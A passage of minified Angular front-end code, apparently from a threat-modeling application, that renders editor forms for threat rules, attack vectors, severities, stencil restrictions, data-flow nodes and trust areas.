center;",4,"ngFor","ngForOf"],["appearance","fill",1,"property-form-field",2,"margin-top","10px"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","125px","margin-left","10px"],[3,"value","valueChange"],[1,"row",2,"margin-top","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["style","margin-top: 15px;",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"value","matTooltip","selectionChange"],[4,"ngFor","ngForOf"],[3,"value"],[3,"label",4,"ngIf"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"padding","0 3px 0 3px"],["color","primary",3,"checked","change"],["matInput","","type","number",3,"ngModel","ngModelChange"],[3,"entry"],["style","margin-top: 10px; margin-bottom: 10px;",4,"ngIf"],[2,"margin-top","10px","margin-bottom","10px"],[3,"capecID"],[3,"cweID"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"control","canEditName","canEditGroup"],[2,"margin-top","15px"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],["matExpansionPanelContent",""],[3,"canEdit","showAttackVector","threatRule"]],template:function(e,i){1&e&&ne(0,e8e,162,75,"div",0),2&e&&V("ngIf",i.attackVector)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function t8e(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(B(3).threatRule.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function i8e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",4),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",30),he("ngModelChange",function(n){return be(e),Me(B(2).threatRule.Name=n)}),u(),s(7,"\n    "),ne(8,t8e,6,3,"button",31),s(9,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.threatRule.Name),C(2),V("ngIf",e.threatRule.Name)}}function a8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n            ",e.Name,"\n          ")}}function n8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n          "),ne(2,a8e,2,2,"mat-option",11),s(3,"\n        "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.AttackVectors)}}function o8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function r8e(t,a){if(1&t&&(s(0,"\n          "),it(1,"app-attack-vector",38),s(2,"\n        ")),2&t){const e=B(3);C(1),V("canEdit",!1)("attackVector",e.threatRule.AttackVector)}}function s8e(t,a){if(1&t&&(m(0,"mat-accordion",35),s(1,"\n      "),m(2,"mat-expansion-panel",36),s(3,"\n        "),m(4,"mat-expansion-panel-header"),s(5,"\n          "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n          "),m(10,"mat-panel-description"),s(11),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n          "),u(),s(15,"\n        "),u(),s(16,"\n        "),ne(17,r8e,3,2,"ng-template",37),s(18,"\n      "),u(),s(19,"\n    "),u()),2&t){const e=B(2);C(7),ct("\n            ",re(8,2,"general.AttackVectorInfo"),"\n          "),C(4),ct("\n            ",e.threatRule.AttackVector.Name,"\n            ")}}function c8e(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n              ",e.Name,"\n            ")}}function l8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n            "),ne(2,c8e,2,3,"mat-option",39),s(3,"\n          "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatCategories)}}function d8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetRuleGenerationTypeName(e)))}}function m8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),m(2,"mat-form-field",4),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B(2).threatRule.RuleGenerationType=n)}),s(9,"\n          "),ne(10,d8e,3,4,"mat-option",11),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n      "),it(14,"br"),s(15,"\n    "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.RuleGenerationType")),C(3),V("value",e.threatRule.RuleGenerationType),C(2),V("ngForOf",e.GetRuleGenerationTypes())}}function u8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n            ",e.Name,"\n          ")}}function h8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n          "),ne(2,u8e,2,2,"mat-option",11),s(3,"\n        "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatRules)}}function f8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                ",re(2,2,i.GetRestrictionTypeName(e)),"\n              ")}}function p8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function _8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function g8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                    "),ne(2,p8e,3,3,"ng-container",16),s(3,"\n                    "),ne(4,_8e,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function C8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,g8e,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function y8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function b8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function M8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                "),ne(4,b8e,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function v8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                "),ne(10,C8e,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n            "),ne(17,y8e,4,1,"ng-container",16),s(18,"\n            "),ne(19,M8e,7,2,"ng-container",16),s(20,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n              ",e.PropertyRest.ComparisonType,"\n            "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function A8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function T8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function E8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PhyElementRest.Property,r))}),s(1,"\n                    "),ne(2,A8e,3,3,"ng-container",16),s(3,"\n                    "),ne(4,T8e,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function D8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,E8e,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function x8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PhyElementRest.Property.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PhyElementRest.Property.Value)}}function w8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function I8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PhyElementRest.Property,n.target.value))}),s(3,"\n                "),ne(4,w8e,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PhyElementRest.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function R8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PhyElementRest.Property.ID=n)}),s(9,"\n                "),ne(10,D8e,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),ne(14,x8e,4,1,"ng-container",16),s(15,"\n            "),ne(16,I8e,7,2,"ng-container",16),s(17,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,5,"general.PropertyName")),C(3),V("value",e.PhyElementRest.Property.ID),C(2),V("ngForOf",i.GetAvailablePhyElementPropertyGroups(e)),C(4),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function S8e(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n            ",e.IsOR?"OR":"AND","\n          ")}}function k8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n            "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n            "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n              "),ne(12,f8e,3,4,"mat-option",47),s(13,"\n            "),u(),s(14,"\n            "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveStencilRestriction(r))}),oe(16,"translate"),s(17,"\n              "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n            "),u(),s(21,"\n          "),u(),s(22,"\n          "),s(23,"\n          "),ne(24,v8e,21,8,"ng-container",16),s(25,"\n          "),s(26,"\n          "),ne(27,R8e,18,7,"ng-container",16),s(28,"\n          "),ne(29,S8e,2,1,"button",49),s(30,"\n        "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,10,"general.Type")),C(3),V("ngModel",e.Layer),C(2),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(3),at("matTooltip",re(16,12,"general.Delete")),C(9),V("ngIf",1==e.RestType),C(3),V("ngIf",3==e.RestType),C(2),V("ngIf",!i)}}function P8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"mat-form-field",41),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),it(8,"input",42),s(9,"\n      "),u(),s(10,"\n      "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(B(2).AddStencilRestriction())}),oe(15,"translate"),s(16,"\n        "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n      "),u(),s(20,"\n      "),m(21,"span",44),s(22),u(),s(23,"\n      "),m(24,"div"),s(25,"\n        "),ne(26,k8e,31,14,"div",45),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=B(2);C(5),ke(re(6,8,"properties.StencilType")),C(3),at("matTooltip",null==e.selectedStencilType?null:e.selectedStencilType.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedStencilType?null:e.selectedStencilType.Name),C(4),ct("\n      ",re(13,10,"properties.Restrictions")," \n      "),C(2),at("matTooltip",re(15,12,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.StencilRestriction.DetailRestrictions)}}function O8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",a.index-1),C(1),ct("\n              ",e,"\n            ")}}function N8e(t,a){1&t&&(m(0,"mat-label"),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"properties.Sender")))}function L8e(t,a){1&t&&(m(0,"mat-label"),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"properties.Receiver")))}function z8e(t,a){if(1&t&&(m(0,"mat-label"),s(1),u()),2&t){const e=B().index;C(1),ct("Node",e,"")}}function W8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){return be(e),Me(B(4).propertyGroups={})}),s(1),u()}if(2&t){const e=a.$implicit;V("value",null==e?null:e.ID),C(1),ct("\n                ",null==e?null:e.Name,"\n              ")}}function F8e(t,a){if(1&t){const e=Ye();m(0,"button",48),he("click",function(){be(e);const n=B().index,r=Ti(11);return Me(B(3).RemoveDFDNode(n,r))}),oe(1,"translate"),s(2,"\n              "),m(3,"mat-icon"),s(4,"delete"),u(),s(5,"\n            "),u()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function V8e(t,a){if(1&t){const e=Ye();m(0,"button",55),he("click",function(){be(e);const n=B().index;return Me(B(3).AddDFDNode(n+1))}),oe(1,"translate"),s(2,"\n            "),m(3,"mat-icon",56),s(4,"east"),u(),s(5,"\n          "),u()}2&t&&at("matTooltip",re(1,1,"pages.config.threatrule.addNode"))}function B8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),ne(4,N8e,3,3,"mat-label",16),s(5,"\n            "),ne(6,L8e,3,3,"mat-label",16),s(7,"\n            "),ne(8,z8e,2,1,"mat-label",16),s(9,"\n            "),m(10,"mat-select",14,57),he("valueChange",function(n){return Me(be(e).$implicit.TypeIDs=n)}),s(12,"\n              "),m(13,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3);return r.TypeIDs=[],Me(c.propertyGroups={})}),s(14),oe(15,"translate"),u(),s(16,"\n              "),ne(17,W8e,2,2,"mat-option",47),s(18,"\n            "),u(),s(19,"\n            "),ne(20,F8e,6,3,"button",58),s(21,"\n          "),u(),s(22,"\n          "),ne(23,V8e,6,3,"button",59),s(24,"\n        "),Mt()}if(2&t){const e=a.$implicit,i=a.first,n=a.last,r=B(3);C(4),V("ngIf",i),C(2),V("ngIf",n),C(2),V("ngIf",!i&&!n),C(2),V("value",e.TypeIDs),C(4),ke(re(15,8,"pages.config.Any")),C(3),V("ngForOf",r.GetDataFlowEntityTypes()),C(3),V("ngIf",!i&&!n),C(3),V("ngIf",!n)}}function H8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",a.index-1),C(1),ct("\n                  ",e,"\n                ")}}function U8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                  ",re(2,2,i.GetRestrictionTypeName(e)),"\n                ")}}function q8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function G8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function j8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                      "),ne(2,q8e,3,3,"ng-container",16),s(3,"\n                      "),ne(4,G8e,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function Q8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,j8e,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function $8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function K8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function X8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                  "),ne(4,K8e,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function Y8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                  "),ne(10,Q8e,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n              "),ne(17,$8e,4,1,"ng-container",16),s(18,"\n              "),ne(19,X8e,7,2,"ng-container",16),s(20,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n                ",e.PropertyRest.ComparisonType,"\n              "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function J8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ct("\n                  ",e.Name,"\n                ")}}function Z8e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",51),s(1,"\n              "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n              "),m(6,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().$implicit.DataflowRest.TrustAreaIDs=n)}),s(7,"\n                "),m(8,"mat-option",50),he("click",function(){return be(e),Me(B().$implicit.DataflowRest.TrustAreaIDs=[])}),s(9),oe(10,"translate"),u(),s(11,"\n                "),ne(12,J8e,2,2,"mat-option",11),s(13,"\n              "),u(),s(14,"\n            "),u()}if(2&t){const e=B().$implicit,i=B(3);C(3),ke(re(4,4,"pages.config.threatrule.crosses")),C(3),V("value",e.DataflowRest.TrustAreaIDs),C(3),ke(re(10,6,"pages.config.Any")),C(3),V("ngForOf",i.GetAvailableTrustAreas())}}function eIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function tIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function iIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PhyElementRest.Property,r))}),s(1,"\n                      "),ne(2,eIe,3,3,"ng-container",16),s(3,"\n                      "),ne(4,tIe,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function aIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,iIe,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function nIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PhyElementRest.Property.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PhyElementRest.Property.Value)}}function oIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function rIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PhyElementRest.Property,n.target.value))}),s(3,"\n                  "),ne(4,oIe,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PhyElementRest.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function sIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PhyElementRest.Property.ID=n)}),s(9,"\n                  "),ne(10,aIe,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),ne(14,nIe,4,1,"ng-container",16),s(15,"\n              "),ne(16,rIe,7,2,"ng-container",16),s(17,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,5,"general.PropertyName")),C(3),V("value",e.PhyElementRest.Property.ID),C(2),V("ngForOf",i.GetAvailablePhyElementPropertyGroups(e)),C(4),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function cIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function lIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function dIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.SenderInterfaceRestriction.Property,r))}),s(1,"\n                      "),ne(2,cIe,3,3,"ng-container",16),s(3,"\n                      "),ne(4,lIe,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function mIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,dIe,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function uIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.SenderInterfaceRestriction.Property.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.SenderInterfaceRestriction.Property.Value)}}function hIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function fIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.SenderInterfaceRestriction.Property,n.target.value))}),s(3,"\n                  "),ne(4,hIe,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.SenderInterfaceRestriction.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function pIe(t,a){if(1&t){const 